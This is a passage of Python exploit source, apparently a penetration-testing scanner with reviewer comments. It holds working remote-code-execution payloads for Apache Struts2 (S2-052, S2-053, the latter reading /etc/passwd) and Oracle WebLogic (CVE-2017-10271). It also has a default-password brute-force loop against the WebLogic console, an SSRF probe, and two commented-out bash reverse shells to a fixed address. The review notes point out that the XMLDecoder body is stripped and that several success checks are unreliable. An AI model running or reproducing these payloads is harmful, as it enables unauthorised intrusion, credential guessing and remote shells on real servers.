        whitespace-separated text, not XStream XML, and will not deserialize.
        An HTTP 500 is taken as success, but any malformed XML body also
        yields a 500, so this is not a reliable indicator.
        """
        payload = ' 0 false 0 '
        payload += 'touch /tmp/success'
        payload += ' false java.lang.ProcessBuilder start foo foo false 0 0 false false 0 '

        headers = {'User-Agent': 'Mozilla/5.0',
                   'Content-Type': 'application/xml'}

        req = requests.post(self.url, headers=headers, data=payload)
        if req.status_code == 500:
            print('[+] s2-052 success ')

    def s2053(self) -> None:
        """Version: 2.0.1/2.3.33/2.5-2.5.10
        remote code execution
        S2-053 (CVE-2017-12611): Freemarker tag attribute evaluated as OGNL.

        NOTE(review): despite the variable name, ``headers`` is sent as the
        POST form body (``data=``) with the expression in the ``redirectUri``
        field - that is the intended injection point, not an HTTP header.
        Success is judged by "root" appearing in the response (cat /etc/passwd).
        """
        payload = """%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"""
        payload += 'cat /etc/passwd'
        # payload += 'bash -i >& /dev/tcp/192.168.1.133/4444 0>&1'
        payload += """').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}\n"""
        headers = {
            'redirectUri':payload
        }

        req = requests.post(self.url, data=headers)

        if 'root' in req.text:
            print('[+] s2-053 success ')
            print(req.text)


if __name__ == '__main__':
    url = 'http://192.168.1.129:8080/hello.action'
    st = Struts2(url)
    # help() prints the class documentation and returns None, so this prints
    # the help text followed by "None"; no check is actually run from here.
    print(help(st))


# ---------------------------------------------------------------------------
# /weblogic.py
# ---------------------------------------------------------------------------
# !/usr/bin/env python
# coding : utf-8
# Date : 2018-04-03 19:08:00
# Author : b4zinga
# Email : b4zinga@outlook.com
# Function: weblogic vuln

import requests


class WebLogic:
    """Checks for Oracle WebLogic Server on port 7001."""

    def __init__(self, url: str):
        if '://' not in url:
            url = 'http://' + url
        self.url = url.strip('/')

    def xmlDecoder(self) -> None:
        """Version:10.3.6.0.0/12.1.3.0.0/12.2.1.1.0
        CVE-2017-10271 - XMLDecoder deserialization in wls-wsat.

        POSTs a java.beans.XMLDecoder payload that runs
        ``/bin/bash -c "id > /tmp/b4"`` and treats HTTP 500 as success.

        NOTE(review): the XML element tags have been stripped from this
        listing (only the text nodes survive below), so the body as shown is
        not a valid XMLDecoder document. Also, wls-wsat returns 500 for any
        malformed SOAP body, so the status alone does not confirm execution.
        """
        headers = {
            "Content-Type":"text/xml;charset=UTF-8",
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }

        # Alternative command left by the author (reverse shell to a fixed
        # address): bash -i >& /dev/tcp/192.168.1.133/4444 0>&1
        xml = """







        /bin/bash


        -c


        id > /tmp/b4







        """
        req = requests.post(self.url+":7001/wls-wsat/CoordinatorPortType", headers=headers, data=xml)
        if req.status_code == 500 :
            print('[+] WebLogic xml decoder ')
            # print(req.text)

    def weakPasswd(self) -> None:
        """weak password

        Tries every user/password pair from ``pwddict`` (121 requests) against
        the console's j_security_check form.

        NOTE(review): with allow_redirects=False the decisive signal is the
        Location header, yet the check reads req.text; whether the 302 carries
        a usable body depends on the server - confirm against a real target.
        verify=False disables TLS certificate checks for https targets, and
        this many failed logins may trip the server's account-lockout policy.
        """

        pwddict = ['WebLogic', 'weblogic', 'Oracle@123', 'password', 'system', 'Administrator', 'admin', 'security', 'joe', 'wlcsystem', 'wlpisystem']
        for user in pwddict:
            for pwd in pwddict:
                data = {
                    'j_username':user,
                    'j_password':pwd,
                    'j_character_encoding':'UTF-8'
                }
                req = requests.post(self.url+':7001/console/j_security_check', data=data, allow_redirects=False, verify=False)

                # A redirect back to LoginForm.jsp means the login failed.
                if req.status_code == 302 and 'console' in req.text and 'LoginForm.jsp' not in req.text:
                    print('[+] WebLogic username: '+user+' password: '+pwd)

    def ssrf(self) -> None:
        """Version: 10.0.2/10.3.6
        CVE-2014-4210 - SSRF through uddiexplorer's ``operator`` parameter.

        Points the server at http://localhost/robots.txt. The page is treated
        as vulnerable when the SOAP-client exception is present (the server
        connected and got a non-SOAP reply) but the "IO Exception on
        sendMessage" text (connection failure) is absent.
        """
        # payload = ":7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001"
        payload = ":7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://localhost/robots.txt&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"

        # NOTE(review): verify=False disables TLS certificate validation.
        req = requests.get(self.url+payload, timeout=10, verify=False)
        if "weblogic.uddi.client.structures.exception.XML_SoapException" in req.text and "IO Exception on sendMessage" not in req.text:
            print("[+] WebLogic ssrf")



if __name__ == '__main__':
    url = '192.168.136.130'
    wls = WebLogic(url)

    wls.xmlDecoder()
    wls.weakPasswd()
    wls.ssrf()